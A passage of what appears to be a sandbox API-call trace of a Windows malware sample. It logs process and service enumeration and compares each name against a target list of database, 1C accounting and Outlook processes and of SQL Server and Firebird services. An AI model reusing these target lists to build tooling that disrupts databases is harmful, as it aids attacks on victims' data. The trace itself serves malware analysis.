(lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0249.226] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.226] lstrlenW (lpString="svchost.exe") returned 11 [0249.226] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0249.226] lstrlenW (lpString="audiodg.exe") returned 11 [0249.226] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.227] lstrlenW (lpString="svchost.exe") returned 11 [0249.227] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.227] lstrlenW (lpString="svchost.exe") returned 11 [0249.227] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0249.228] lstrlenW (lpString="userinit.exe") returned 12 [0249.228] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0249.228] lstrlenW (lpString="dwm.exe") returned 7 [0249.228] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.228] lstrlenW (lpString="explorer.exe") returned 12 [0249.228] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0249.229] lstrlenW (lpString="spoolsv.exe") returned 11 [0249.229] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0249.229] lstrlenW (lpString="taskhost.exe") returned 12 [0249.229] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.229] lstrlenW (lpString="svchost.exe") returned 11 [0249.230] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0249.230] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0249.230] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0249.231] lstrlenW (lpString="reader_sl.exe") returned 13 [0249.231] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0249.231] lstrlenW (lpString="dllhost.exe") returned 11 [0249.231] Process32NextW (in: hSnapshot=0x394, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0249.231] CloseHandle (hObject=0x394) returned 1 [0249.231] Sleep (dwMilliseconds=0x1f4) [0249.954] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea330 [0249.957] EnumServicesStatusExW (in: hSCManager=0x47ea330, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0249.958] GetLastError () returned 0xea [0249.958] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xcec) returned 0x3dee5b0 [0249.958] EnumServicesStatusExW (in: hSCManager=0x47ea330, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dee5b0, cbBufSize=0xcec, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dee5b0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0249.958] CloseServiceHandle (hSCObject=0x47ea330) returned 1 [0249.958] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0249.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0249.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0249.959] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0249.959] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0249.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0249.959] lstrlenW (lpString="AudioSrv") returned 8 [0249.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0249.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0249.959] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0249.959] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0249.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0249.959] lstrlenW (lpString="BFE") returned 3 [0249.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0249.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0249.959] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0249.959] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0249.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0249.959] lstrlenW (lpString="CryptSvc") returned 8 [0249.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0249.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0249.959] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0249.959] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0249.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0249.959] lstrlenW (lpString="CscService") returned 10 [0249.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0249.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0249.959] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0249.959] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0249.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0249.959] lstrlenW (lpString="DcomLaunch") returned 10 [0249.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0249.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0249.960] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0249.960] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0249.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0249.960] lstrlenW (lpString="Dhcp") returned 4 [0249.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0249.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0249.960] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0249.960] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0249.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0249.960] lstrlenW (lpString="Dnscache") returned 8 [0249.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0249.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0249.960] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0249.960] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0249.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0249.960] lstrlenW (lpString="DPS") returned 3 [0249.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0249.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0249.960] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0249.961] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0249.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0249.961] lstrlenW (lpString="eventlog") returned 8 [0249.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0249.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0249.961] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0249.961] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0249.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0249.961] lstrlenW (lpString="EventSystem") returned 11 [0249.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0249.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0249.961] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0249.961] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0249.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0249.961] lstrlenW (lpString="gpsvc") returned 5 [0249.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0249.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0249.961] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0249.961] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0249.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0249.961] lstrlenW (lpString="LanmanWorkstation") returned 17 [0249.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0249.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0249.961] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0249.961] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0249.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0249.961] lstrlenW (lpString="lmhosts") returned 7 [0249.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0249.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0249.962] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0249.962] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0249.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0249.962] lstrlenW (lpString="MMCSS") returned 5 [0249.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0249.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0249.962] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0249.962] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0249.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0249.962] lstrlenW (lpString="MpsSvc") returned 6 [0249.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0249.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0249.962] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0249.962] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0249.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0249.962] lstrlenW (lpString="NlaSvc") returned 6 [0249.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0249.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0249.962] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0249.962] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0249.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0249.962] lstrlenW (lpString="nsi") returned 3 [0249.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0249.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0249.962] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0249.962] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0249.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0249.962] lstrlenW (lpString="PcaSvc") returned 6 [0249.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0249.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0249.963] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0249.963] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0249.963] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0249.963] lstrlenW (lpString="PlugPlay") returned 8 [0249.963] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0249.963] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0249.963] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0249.963] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0249.963] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0249.963] lstrlenW (lpString="Power") returned 5 [0249.963] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0249.963] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0249.963] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0249.963] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0249.963] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0249.963] lstrlenW (lpString="ProfSvc") returned 7 [0249.963] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0249.963] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0249.963] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0249.963] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0249.963] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0249.963] lstrlenW (lpString="RpcEptMapper") returned 12 [0249.963] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0249.963] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0249.963] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0249.963] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0249.964] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0249.964] lstrlenW (lpString="RpcSs") returned 5 [0249.964] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0249.964] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0249.964] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0249.964] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0249.964] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0249.964] lstrlenW (lpString="SamSs") returned 5 [0249.964] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0249.964] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0249.964] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0249.964] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0249.964] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0249.964] lstrlenW (lpString="Schedule") returned 8 [0249.964] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0249.964] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0249.964] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0249.964] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0249.964] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0249.964] lstrlenW (lpString="SENS") returned 4 [0249.964] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0249.964] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0249.964] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0249.964] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0249.964] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0249.964] lstrlenW (lpString="ShellHWDetection") returned 16 [0249.965] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0249.965] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0249.965] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0249.965] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0249.965] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0249.965] lstrlenW (lpString="Spooler") returned 7 [0249.965] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0249.965] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0249.965] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0249.965] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0249.965] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0249.965] lstrlenW (lpString="SysMain") returned 7 [0249.965] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0249.965] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0249.965] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0249.965] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0249.965] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0249.965] lstrlenW (lpString="Themes") returned 6 [0249.965] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0249.965] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0249.965] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0249.965] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0249.965] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0249.965] lstrlenW (lpString="UxSms") returned 5 [0249.965] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0249.965] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0249.965] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0249.965] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0249.965] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0249.965] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dee5b0 | out: hHeap=0xb00000) returned 1 [0249.966] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3b8 [0249.967] Process32FirstW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.967] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0249.967] lstrlenW (lpString="System") returned 6 [0249.967] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0249.967] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0249.967] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0249.967] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0249.968] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0249.968] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0249.968] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0249.968] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0249.968] lstrlenW (lpString="smss.exe") returned 8 [0249.968] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0249.968] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0249.968] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0249.968] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0249.968] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0249.968] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0249.968] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0249.968] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.968] lstrlenW (lpString="csrss.exe") returned 9 [0249.968] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0249.968] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0249.968] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0249.968] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0249.968] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0249.969] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0249.969] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0249.969] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0249.969] lstrlenW (lpString="wininit.exe") returned 11 [0249.969] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0249.969] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0249.969] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0249.969] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0249.969] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0249.969] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0249.969] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0249.969] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.969] lstrlenW (lpString="csrss.exe") returned 9 [0249.969] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0249.969] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0249.969] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0249.969] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0249.970] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0249.970] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0249.970] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0249.970] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: 